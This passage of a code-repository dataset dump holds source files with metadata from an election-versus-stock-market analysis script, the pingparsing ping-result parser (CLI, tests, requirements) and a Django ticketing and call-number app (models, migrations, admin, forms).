'=AverageChange!$A$2:$A$6',\n 'values': '=AverageChange!$C$2:$C$6',\n })\n chart_object.add_series({\n 'name': '=AverageChange!$D$1',\n 'categories': '=AverageChange!$A$2:$A$6',\n 'values': '=AverageChange!$D$2:$D$6',\n })\n chart_object.add_series({\n 'name': '=AverageChange!$E$1',\n 'categories': '=AverageChange!$A$2:$A$6',\n 'values': '=AverageChange!$E$2:$E$6',\n })\n chart_object.set_title({'name': 'Combined Mean'})\n chart_object.set_x_axis({'name': 'Markets'})\n chart_object.set_y_axis({'name': '% Change'})\n worksheet_object.insert_chart('G2', chart_object, {'x_offset': 20, 'y_offset': 0})\n writer_object.save()\n\n\nclass ProcessData:\n\n def __init__(self):\n self.number_of_elections = 0\n self.elections = []\n self.election_values = []\n self.election_keys = []\n self.house_dems = []\n self.house_repubs = []\n self.senate_repubs = []\n self.senate_dems = []\n self.presidents = []\n self.this_year = []\n self.congress_date = []\n self.house_held = []\n self.senate_held = []\n self.stock_market = []\n\n def all_elections(self):\n self.elections += election_dict\n self.election_values += election_dict.values()\n self.election_keys += election_dict.keys()\n for each_election in self.elections:\n self.this_year += [each_election]\n self.house_dems += [election_dict.get(each_election).house_dem]\n self.house_repubs += [election_dict.get(each_election).house_repub]\n self.senate_repubs += [election_dict.get(each_election).senate_repub]\n self.senate_dems += [election_dict.get(each_election).senate_dem]\n self.presidents += [election_dict.get(each_election).president]\n self.congress_date += [election_dict.get(each_election).congress_date]\n self.house_held += [election_dict.get(each_election).house_held]\n self.senate_held += [election_dict.get(each_election).senate_held]\n\n\nclass USA:\n def __init__(self, president, president_election, president_party, presidential_date, congress, house_total, house_dem, house_repub, senate_total, senate_dem, senate_repub, congress_date):\n\n self.house_dem = ''\n self.house_repub = ''\n self.senate_repub = ''\n self.senate_dem = ''\n self.president = president#Col B\n self.president_election = president_election #Col A\n self.president_party = president_party#Col C\n self.president_date = presidential_date #Col D if Y/N\n self.congress_date = congress_date #Col G\n self.congress = congress #Col F\n self.house_total = house_total #Col U\n if len(house_dem) > 1:\n self.house_dem = int(house_dem) #Col V\n else:\n self.house_dem = 1\n if len(house_repub) > 1:\n self.house_repub = int(house_repub) #Col W\n else:\n self.house_repub = 1\n self.senate_total = senate_total #Col P\n if len(senate_dem) > 1:\n self.senate_dem = int(senate_dem) #Col Q\n else:\n self.senate_dem = 1\n if len(senate_repub) > 1:\n self.senate_repub = int(senate_repub) #Col R\n else:\n self.senate_repub = 1\n self.house_held = self.house_dem / self.house_repub\n self.senate_held = self.senate_dem / self.senate_repub\n self.week_start = ''\n self.week_end = ''\n\n def start_of_week(self):\n self.week_start = ''\n if len(self.congress_date) > 3:\n hopefully_tuesday = datetime.strptime(self.congress_date, '%B %d, %Y')\n beginning_of_week = hopefully_tuesday.weekday()\n self.week_start = hopefully_tuesday - timedelta(beginning_of_week)\n self.week_end = self.week_start + timedelta(4)\n\n def get_stock_week_of(self):\n stock_market = {\n 'SPY': ('^GSPC','1990-1-2'),#goes/ went back to 70\n 'NASDAQ': ('^IXIC','1990-2-1'),#goes/went back to 71\n 'DOW': ('^DJI','1990-1-29'),#used to go back to 85\n 'NYSE': ('^NYA','1990-1-2')#goes/went back to 70\n }\n within_stock_market_range = [key for key in stock_market if len(self.congress_date) > 3 and self.week_start > datetime.strptime(stock_market.get(key)[1], '%Y-%m-%d')]\n for stock in within_stock_market_range:\n stock_val = pdr.get_data_yahoo(stock_market.get(stock)[0], start=self.week_start.strftime('%Y-%m-%d'),end=self.week_end.strftime('%Y-%m-%d'))\n all_yahoo_data.update({self.congress+'_'+stock : stock_val})\n time.sleep(2)\n\n\nwith open('elections.csv', 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n next(csv_reader)\n for line in csv_reader:\n if len(line) > 2:\n election = USA(line[1],line[0],line[2],line[3],line[5],line[20],line[21],line[22],line[15],line[16],line[17],line[6])\n election.start_of_week()\n election.get_stock_week_of()\n if election.president_date not in election_dict:\n election_dict[election.congress] = election\n lets_process = ProcessData()\n lets_process.all_elections()\n # collect object dataframes into one for analysis\n write_to_formatted_excel()\ncsv_file.close()\n\n\n\"\"\"\n\nNext:\n\nStart learning charts to create data cuts\n\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.7631579041481018,
"alphanum_fraction": 0.7631579041481018,
"avg_line_length": 37,
"blob_id": "9b0262a64346ec0b3a685539f0c76bd060a79311",
"content_id": "9a1b9891000b83c5f44aa506ab86f12d54e15f15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 1,
"path": "/matplotlib_charts/readme.txt",
"repo_name": "ryanakuhl/Election-Market-Analysis",
"src_encoding": "UTF-8",
"text": "Just a few graphs based off the data.\n"
}
] | 3 |
coolkabc/pingparsing | https://github.com/coolkabc/pingparsing | ea56651266d87647a1996318d86e11cd53efc481 | 91152de8b6137f3574601fe00ee2ba9725535c07 | e95aaffd90a796b28ceb9ebee5ff11f6aa870d7f | refs/heads/master | 2020-04-23T01:07:13.386910 | 2019-02-12T16:05:31 | 2019-02-12T16:05:31 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.47783252596855164,
"alphanum_fraction": 0.674876868724823,
"avg_line_length": 24.375,
"blob_id": "5f4fd4b40481ef604aeaa2ea8815caf239d120a9",
"content_id": "b637ab08e25ebeb4f8ddc11e44e831a643e33407",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 203,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 8,
"path": "/requirements/requirements.txt",
"repo_name": "coolkabc/pingparsing",
"src_encoding": "UTF-8",
"text": "enum34;python_version<\"3.4\"\nfutures;python_version<\"3.2\"\nipaddress;python_version<\"3.3\"\nLogbook>=1.1.0,<2.0.0\npyparsing>=2.2.2,<3.0.0\nsix>=1.11.0,<2.0.0\nsubprocrunner>=0.16.0,<1.0.0\ntypepy>=0.4.0,<1.0.0\n"
},
{
"alpha_fraction": 0.6444946527481079,
"alphanum_fraction": 0.6519212126731873,
"avg_line_length": 30.282827377319336,
"blob_id": "03b86cb88440ecafed6394c84f24e289a9ea4899",
"content_id": "3836f5b93a2a0192dc63ba86fd1857fda7824c6f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3097,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 99,
"path": "/test/test_cli.py",
"repo_name": "coolkabc/pingparsing",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\n\n\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals\n\nimport pytest\nimport simplejson as json\nfrom subprocrunner import SubprocessRunner\n\nfrom .data import DEBIAN_SUCCESS_0, WINDOWS7SP1_SUCCESS\n\n\ndef print_result(stdout, stderr):\n print(\"[stdout]\\n{}\".format(stdout))\n print(\"[stderr]\\n{}\".format(stderr))\n\n\[email protected](run=False)\nclass Test_cli_file(object):\n def test_normal_single(self, tmpdir):\n tmp_ping_file = tmpdir.join(\"ping_deb.txt\")\n tmp_ping_file.write(DEBIAN_SUCCESS_0.value)\n tmp_ping_path = str(tmp_ping_file)\n\n runner = SubprocessRunner([\"pingparsing\", tmp_ping_path])\n runner.run()\n\n print_result(stdout=runner.stdout, stderr=runner.stderr)\n\n assert runner.returncode == 0\n assert json.loads(runner.stdout)[tmp_ping_path] == DEBIAN_SUCCESS_0.expected\n\n def test_normal_multi(self, tmpdir):\n tmp_ping_file_deb = tmpdir.join(\"ping_deb.txt\")\n tmp_ping_file_deb.write(DEBIAN_SUCCESS_0.value)\n tmp_ping_path_deb = str(tmp_ping_file_deb)\n\n tmp_ping_file_win = tmpdir.join(\"ping_win.txt\")\n tmp_ping_file_win.write(WINDOWS7SP1_SUCCESS.value)\n tmp_ping_path_win = str(tmp_ping_file_win)\n\n runner = SubprocessRunner([\"pingparsing\", tmp_ping_path_deb, tmp_ping_path_win])\n runner.run()\n\n print_result(stdout=runner.stdout, stderr=runner.stderr)\n\n assert runner.returncode == 0\n\n parsed_result = json.loads(runner.stdout)\n assert parsed_result[tmp_ping_path_deb] == DEBIAN_SUCCESS_0.expected\n assert parsed_result[tmp_ping_path_win] == WINDOWS7SP1_SUCCESS.expected\n\n\[email protected](run=False)\nclass Test_cli_pipe(object):\n def test_normal_single(self, tmpdir):\n runner = SubprocessRunner([\"pingparsing\"])\n runner.run(input=DEBIAN_SUCCESS_0.value)\n\n print_result(stdout=runner.stdout, stderr=runner.stderr)\n\n assert runner.returncode == 0\n assert json.loads(runner.stdout) == DEBIAN_SUCCESS_0.expected\n\n\[email protected](run=False)\nclass Test_PingParsing_ping(object):\n def test_normal_single(self):\n count = 1\n dest = \"localhost\"\n runner = SubprocessRunner([\"pingparsing\", dest, \"-c\", count])\n runner.run()\n\n print_result(stdout=runner.stdout, stderr=runner.stderr)\n\n assert runner.returncode == 0\n\n parsed_result = json.loads(runner.stdout)\n\n assert parsed_result[dest][\"packet_transmit\"] == count\n assert parsed_result[dest][\"rtt_max\"] > 0\n\n def test_normal_multi(self):\n count = 1\n dest_list = [\"google.com\", \"twitter.com\"]\n runner = SubprocessRunner([\"pingparsing\"] + dest_list + [\"-c\", count])\n runner.run()\n\n print_result(stdout=runner.stdout, stderr=runner.stderr)\n\n assert runner.returncode == 0\n\n parsed_result = json.loads(runner.stdout)\n for dest in dest_list:\n assert parsed_result[dest][\"packet_transmit\"] == count\n assert parsed_result[dest][\"rtt_max\"] > 0\n"
},
{
"alpha_fraction": 0.5804249048233032,
"alphanum_fraction": 0.5819423198699951,
"avg_line_length": 27.142349243164062,
"blob_id": "9434b9a25c67dd815d35f2602a6a1b1e405425dc",
"content_id": "fa26597246ad2f93039ccc83a0c953cb95e216d7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7908,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 281,
"path": "/pingparsing/cli.py",
"repo_name": "coolkabc/pingparsing",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport multiprocessing\nimport os\nimport sys\nfrom textwrap import dedent\n\nimport logbook\nfrom subprocrunner import CommandError\n\nfrom .__version__ import __version__\nfrom ._logger import set_log_level\nfrom ._pingparsing import PingParsing\nfrom ._pingtransmitter import PingTransmitter\n\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\n\nDEFAULT_COUNT = 10\nQUIET_LOG_LEVEL = logbook.NOTSET\n\n\ndef parse_option():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=dedent(\n \"\"\"\\\n Documentation: https://pingparsing.rtfd.io/\n Issue tracker: https://github.com/thombashi/pingparsing/issues\n \"\"\"\n ),\n )\n parser.add_argument(\n \"-V\", \"--version\", action=\"version\", version=\"%(prog)s {}\".format(__version__)\n )\n\n if is_use_stdin():\n parser.add_argument(\"destination_or_file\", nargs=\"+\", help=\"\")\n\n parser.add_argument(\n \"--max-workers\",\n type=int,\n help=\"\"\"Number of threads for when multiple destination/file\n specified. defaults to equals to two times number of cores.\n \"\"\",\n )\n parser.add_argument(\n \"--indent\",\n type=int,\n default=4,\n help=\"\"\"JSON output will be pretty-printed with the indent level.\n (default= %(default)s)\n \"\"\",\n )\n parser.add_argument(\n \"--icmp-reply\",\n action=\"store_true\",\n default=False,\n help=\"print results for each ICMP packet reply.\",\n )\n\n loglevel_dest = \"log_level\"\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n \"--debug\",\n dest=loglevel_dest,\n action=\"store_const\",\n const=logbook.DEBUG,\n default=logbook.INFO,\n help=\"for debug print.\",\n )\n group.add_argument(\n \"--quiet\",\n dest=loglevel_dest,\n action=\"store_const\",\n const=QUIET_LOG_LEVEL,\n default=logbook.INFO,\n help=\"suppress execution log messages.\",\n )\n\n group = parser.add_argument_group(\"Ping Options\")\n group.add_argument(\n \"-c\",\n \"--count\",\n type=int,\n help=\"\"\"stop after sending the count.\n see also ping(8) [-c count] option description.\n \"\"\",\n )\n group.add_argument(\n \"-w\",\n \"--deadline\",\n type=float,\n help=\"\"\"timeout in seconds.\n see also ping(8) [-w deadline] option description.\n note: meaning of the 'deadline' may differ system to system.\n \"\"\",\n )\n group.add_argument(\n \"--timeout\",\n type=float,\n help=\"\"\"Time to wait for a response, in milliseconds.\n If the system does not support timeout in milliseconds, round up as seconds.\n Use system default if not specified.\n Ignored if the system does not support timeout itself.\n\n See also ping(8) [-W timeout] option description.\n note: meaning of the 'timeout' may differ system to system.\n \"\"\",\n )\n group.add_argument(\"-I\", \"--interface\", dest=\"interface\", help=\"network interface\")\n\n return parser.parse_args()\n\n\ndef initialize_log_handler(log_level):\n debug_level_format_str = (\n \"[{record.level_name}] {record.channel} {record.func_name} \"\n \"({record.lineno}): {record.message}\"\n )\n if log_level == logbook.DEBUG:\n info_level_format_str = debug_level_format_str\n else:\n info_level_format_str = \"[{record.level_name}] {record.channel}: {record.message}\"\n\n logbook.StderrHandler(\n level=logbook.DEBUG, format_string=debug_level_format_str\n ).push_application()\n logbook.StderrHandler(\n level=logbook.INFO, format_string=info_level_format_str\n ).push_application()\n\n\ndef is_use_stdin():\n return sys.stdin.isatty() or len(sys.argv) > 1\n\n\ndef parse_ping(logger, dest_or_file, interface, count, deadline, timeout, is_parse_icmp_reply):\n if os.path.isfile(dest_or_file):\n with open(dest_or_file) as f:\n ping_result_text = f.read()\n else:\n transmitter = PingTransmitter()\n transmitter.destination_host = dest_or_file\n transmitter.interface = interface\n transmitter.count = count\n transmitter.deadline = deadline\n transmitter.timeout = timeout\n transmitter.is_quiet = not is_parse_icmp_reply\n\n try:\n result = transmitter.ping()\n except CommandError as e:\n logger.error(e)\n sys.exit(e.errno)\n\n ping_result_text = result.stdout\n if result.returncode != 0:\n logger.error(result.stderr)\n\n ping_parser = PingParsing()\n stats = ping_parser.parse(ping_result_text)\n output = stats.as_dict()\n if is_parse_icmp_reply:\n output[\"icmp_reply\"] = stats.icmp_reply_list\n\n return (dest_or_file, output)\n\n\ndef get_ping_param(options):\n count = options.count\n deadline = options.deadline\n timeout = options.timeout\n\n if not options.count and not options.deadline:\n count = DEFAULT_COUNT\n\n return (count, deadline, timeout)\n\n\ndef print_result(text):\n if not sys.stdout.isatty():\n # avoid to colorized when piped or redirected\n print(text)\n return\n\n try:\n from pygments import highlight\n from pygments.lexers import JsonLexer\n from pygments.formatters import TerminalTrueColorFormatter\n\n print(\n highlight(\n code=text, lexer=JsonLexer(), formatter=TerminalTrueColorFormatter(style=\"monokai\")\n ).strip()\n )\n except ImportError:\n print(text)\n\n\ndef main():\n options = parse_option()\n\n initialize_log_handler(options.log_level)\n\n logger = logbook.Logger(\"pingparsing cli\")\n logger.level = options.log_level\n set_log_level(options.log_level)\n\n output = {}\n if is_use_stdin():\n from concurrent import futures\n\n set_log_level(options.log_level)\n\n max_workers = (\n multiprocessing.cpu_count() * 2 if options.max_workers is None else options.max_workers\n )\n count, deadline, timeout = get_ping_param(options)\n logger.debug(\n \"max-workers={}, count={}, deadline={}, timeout={}\".format(\n max_workers, count, deadline, timeout\n )\n )\n\n try:\n with futures.ProcessPoolExecutor(max_workers) as executor:\n future_list = []\n for dest_or_file in options.destination_or_file:\n logger.debug(\"start {}\".format(dest_or_file))\n future_list.append(\n executor.submit(\n parse_ping,\n logger,\n dest_or_file,\n options.interface,\n count,\n deadline,\n timeout,\n options.icmp_reply,\n )\n )\n\n for future in futures.as_completed(future_list):\n key, ping_data = future.result()\n output[key] = ping_data\n finally:\n logger.debug(\"shutdown ProcessPoolExecutor\")\n executor.shutdown()\n else:\n ping_result_text = sys.stdin.read()\n ping_parser = PingParsing()\n stats = ping_parser.parse(ping_result_text)\n output = stats.as_dict()\n if options.icmp_reply:\n output[\"icmp_reply\"] = stats.icmp_reply_list\n\n if options.indent <= 0:\n result = json.dumps(output)\n else:\n result = json.dumps(output, indent=options.indent)\n\n print_result(result)\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.8484848737716675,
"alphanum_fraction": 0.8484848737716675,
"avg_line_length": 7.25,
"blob_id": "a39e8f79de918916f60bbc79fd494b8cdb733395",
"content_id": "15544369296be43a63ee9c8999eb163a4c951b64",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 33,
"license_type": "permissive",
"max_line_length": 10,
"num_lines": 4,
"path": "/requirements/test_requirements.txt",
"repo_name": "coolkabc/pingparsing",
"src_encoding": "UTF-8",
"text": "pytest-cov\npytest\nsimplejson\ntox\n"
}
] | 4 |
deemoxuchao/newcall | https://github.com/deemoxuchao/newcall | 725c799d5fb8f474231e2c607f248e70e6b06475 | 97ffff1c3ef5f010dbab69e72b62f5e1024070ff | 89905b7557dcfd57ec1187979b8065e76b4cce05 | refs/heads/master | 2020-12-09T08:55:14.803177 | 2020-01-11T15:46:29 | 2020-01-11T15:46:29 | 233,255,511 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5763546824455261,
"alphanum_fraction": 0.5829228162765503,
"avg_line_length": 39.45000076293945,
"blob_id": "56f02e036b9779b9b4a2a63f08514b1291f4e42b",
"content_id": "53bb0f143e3ba80aae265f7cfd8eb7182779ce8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2648,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 60,
"path": "/apps/tickets/models.py",
"repo_name": "deemoxuchao/newcall",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\n\nfrom django.db import models\n\n# Create your models here.\n\n\nclass BizTicket(models.Model):\n name = models.CharField(max_length=100, verbose_name=u'票种名', unique=True)\n ct = models.DateTimeField(default=datetime.now, verbose_name=u'创建时间')\n\n class Meta:\n verbose_name = u'票种信息'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.name\n\n\nclass BizOrderInfo(models.Model):\n order_sn = models.IntegerField(verbose_name=u'订单号')\n order_linkman = models.CharField(max_length=32, verbose_name=u'联系人')\n order_status = models.IntegerField(choices=((0, '未付款'),\n (1, '已付款'),\n (2, '已完成'),\n (3, '已关闭'),\n (4, '使用中')), verbose_name=u'订单状态')\n ct = models.DateTimeField(default=datetime.now, verbose_name=u'创建时间')\n order_over_time = models.DateTimeField(null=True, blank=True, verbose_name=u'订单完成时间')\n order_pay_time = models.DateTimeField(null=True, blank=True, verbose_name=u'支付时间')\n ut = models.DateTimeField(default=datetime.now, verbose_name=u'更新时间')\n\n class Meta:\n verbose_name = u'订单信息'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return str(self.order_sn)\n\n\nclass BizOrderTicket(models.Model):\n order_sn = models.ForeignKey(BizOrderInfo, on_delete=models.CASCADE)\n ticket_name = models.ForeignKey(BizTicket, on_delete=models.CASCADE)\n ticket_start_time = models.DateTimeField(verbose_name=u'有效期开始时间')\n ticket_end_time = models.DateTimeField(verbose_name=u'有效期结束时间')\n ticket_status = models.IntegerField(choices=((0, '未使用'),\n (1, '已使用'),\n (2, '已关闭'),\n (3, '已退款')), verbose_name=u'单票状态')\n num = models.IntegerField(verbose_name=u'数量', default=1)\n code = models.CharField(max_length=8, verbose_name=u'检票码', default='')\n ct = models.DateTimeField(default=datetime.now, verbose_name=u'创建时间')\n ut = models.DateTimeField(default=datetime.now, verbose_name=u'更新时间')\n\n class Meta:\n verbose_name = u'订单票信息'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return '{}.{}'.format(self.order_sn, self.ticket_name)\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5170068144798279,
"alphanum_fraction": 0.5691609978675842,
"avg_line_length": 23.5,
"blob_id": "ea8f6364d62703006bc978a03d2e63dc20eb7686",
"content_id": "04ab46754a12427955cdfa46b966fb720bcf395e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 18,
"path": "/apps/users/migrations/0002_auto_20200109_2030.py",
"repo_name": "deemoxuchao/newcall",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.2 on 2020-01-09 20:30\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='userprofile',\n name='role',\n field=models.IntegerField(choices=[(1, '管理员'), (2, '票务员'), (3, '骑手')], default=1, verbose_name='用户角色'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5390244126319885,
"alphanum_fraction": 0.5926828980445862,
"avg_line_length": 21.77777862548828,
"blob_id": "d3cc5c5c54327e4aaad89c20f12ab19212d4471e",
"content_id": "537e3faae4c96068365db708b6c9037a8f399b9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 416,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 18,
"path": "/apps/tickets/migrations/0002_auto_20200109_2104.py",
"repo_name": "deemoxuchao/newcall",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.2 on 2020-01-09 21:04\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tickets', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='bizticket',\n name='name',\n field=models.CharField(max_length=100, unique=True, verbose_name='票种名'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5664375424385071,
"alphanum_fraction": 0.5910652875900269,
"avg_line_length": 46.18918991088867,
"blob_id": "c6b3c7295a367cf136a0446fc5f5ca7d73d3dd8f",
"content_id": "2cc40aa73d1721db2197bedf7122a264e6ec0bd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1884,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 37,
"path": "/apps/call/migrations/0001_initial.py",
"repo_name": "deemoxuchao/newcall",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.2 on 2020-01-09 21:04\n\nimport datetime\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('tickets', '0002_auto_20200109_2104'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='CallNumberInfo',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('horse_type', models.IntegerField(choices=[(1, 'PONY马'), (2, '单人马'), (3, '双人马')], verbose_name='骑乘类型')),\n ('today_id', models.IntegerField(verbose_name='今日编号')),\n ('call_status', models.IntegerField(choices=[(1, '未取号'), (2, '等待中'), (3, '过号'), (4, '已完成'), (5, '已作废')], default=1, verbose_name='骑乘类型')),\n ('ct', models.DateTimeField(default=datetime.datetime.now, verbose_name='创建时间')),\n ('ride_time', models.DateTimeField(blank=True, null=True, verbose_name='骑乘开始时间')),\n ('create_type', models.IntegerField(choices=[(1, '检出票'), (2, '自定义票')], default=1, verbose_name='创建类型')),\n ('create_uid', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='account', verbose_name='创建人')),\n ('ticket_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tickets.BizTicket', to_field='name', verbose_name='票种类型')),\n ],\n options={\n 'verbose_name': '叫号系统',\n 'verbose_name_plural': '叫号系统',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.660682201385498,
"alphanum_fraction": 0.6750448942184448,
"avg_line_length": 33.75,
"blob_id": "3972b48e53d19401d8d1ff1d8d22ab09e0c7446f",
"content_id": "cb30ffea90855593d8e8517cb7197ed367a65841",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 597,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 16,
"path": "/apps/users/models.py",
"repo_name": "deemoxuchao/newcall",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n# Create your models here.\n\n\nclass UserProfile(AbstractUser):\n nickname = models.CharField(max_length=50, verbose_name=u'昵称', default='')\n role = models.IntegerField(choices=((1, u'管理员'), (2, u'票务员'), (3, u'骑手')), verbose_name=u'用户角色', default=1)\n account = models.CharField(max_length=10, verbose_name=u'账号', unique=True)\n\n class Meta:\n verbose_name = u'用户信息'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.account\n\n"
},
{
"alpha_fraction": 0.6208333373069763,
"alphanum_fraction": 0.675000011920929,
"avg_line_length": 23,
"blob_id": "934c75e99f963d4becb72e4b4d920da0a2949dfa",
"content_id": "6286936fcc17ac80d4500c84dc0f5bb32e47525d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 10,
"path": "/apps/users/forms.py",
"repo_name": "deemoxuchao/newcall",
"src_encoding": "UTF-8",
"text": "# _*_ encoding:utf-8 _*_\n__author__ = 'hsurich'\n__date__ = '2020/1/11 21:45'\n\nfrom django import forms\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(required=True)\n password = forms.CharField(required=True, min_length=6)\n"
},
{
"alpha_fraction": 0.5568428635597229,
"alphanum_fraction": 0.5655322074890137,
"avg_line_length": 45,
"blob_id": "fa3e23074024851b54f0533efe3b06eb1f6861e3",
"content_id": "306f09c3768d0d0c83e6edb7febc8b38a6854f8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1511,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 30,
"path": "/apps/call/models.py",
"repo_name": "deemoxuchao/newcall",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\n\nfrom django.db import models\n\nfrom users.models import UserProfile\nfrom tickets.models import BizTicket\n# Create your models here.\n\n\nclass CallNumberInfo(models.Model):\n ticket_name = models.ForeignKey(BizTicket, on_delete=models.CASCADE, to_field='name', verbose_name=u'票种类型')\n horse_type = models.IntegerField(choices=((1, 'PONY马'), (2, '单人马'), (3, '双人马')), verbose_name=u'骑乘类型')\n today_id = models.IntegerField(verbose_name=u'今日编号')\n call_status = models.IntegerField(choices=(\n (1, '未取号'),\n (2, '等待中'),\n (3, '过号'),\n (4, '已完成'),\n (5, '已作废')), default=1, verbose_name=u'骑乘类型')\n ct = models.DateTimeField(default=datetime.now, verbose_name=u'创建时间')\n ride_time = models.DateTimeField(null=True, blank=True, verbose_name=u'骑乘开始时间')\n create_uid = models.ForeignKey(UserProfile, on_delete=models.CASCADE, to_field='account', verbose_name=u'创建人')\n create_type = models.IntegerField(choices=((1, '检出票'), (2, '自定义票')), default=1, verbose_name=u'创建类型')\n\n class Meta:\n verbose_name = u'叫号系统'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.today_id\n\n"
},
{
"alpha_fraction": 0.7352941036224365,
"alphanum_fraction": 0.7352941036224365,
"avg_line_length": 18.285715103149414,
"blob_id": "64030f2ebc8cffd8caa1c9144ab45952e42f7ad6",
"content_id": "0feab01fa5b627ccb531cc73f65875e673a325e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 136,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 7,
"path": "/apps/tickets/views.py",
"repo_name": "deemoxuchao/newcall",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\n\n\ndef get_html(request):\n return render(request, 'scan_ticket.html')\n\n"
},
{
"alpha_fraction": 0.8067415952682495,
"alphanum_fraction": 0.8067415952682495,
"avg_line_length": 19.18181800842285,
"blob_id": "462eb07a04719ff9b985b9a5ba83cbaf4597d7f7",
"content_id": "e388aed32434cede4530f981134115e0ca3f9e0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 22,
"path": "/apps/tickets/admin.py",
"repo_name": "deemoxuchao/newcall",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\n\nfrom .models import BizTicket, BizOrderInfo, BizOrderTicket\n\n\nclass BizTicketAdmin(admin.ModelAdmin):\n pass\n\n\nclass BizOrderInfoAdmin(admin.ModelAdmin):\n pass\n\n\nclass BizOrderTicketAdmin(admin.ModelAdmin):\n pass\n\n\nadmin.site.register(BizTicket, BizTicketAdmin)\nadmin.site.register(BizOrderInfo, BizOrderInfoAdmin)\nadmin.site.register(BizOrderTicket, BizOrderTicketAdmin)\n\n"
},
{
"alpha_fraction": 0.5459529161453247,
"alphanum_fraction": 0.5559496879577637,
"avg_line_length": 47.453125,
"blob_id": "988b7572a4badc8d038d46c806e72921a7b5a6b9",
"content_id": "4b20a4b27669299ceb990290efb82fff5969f503",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3339,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 64,
"path": "/apps/tickets/migrations/0001_initial.py",
"repo_name": "deemoxuchao/newcall",
"src_encoding": "UTF-8",
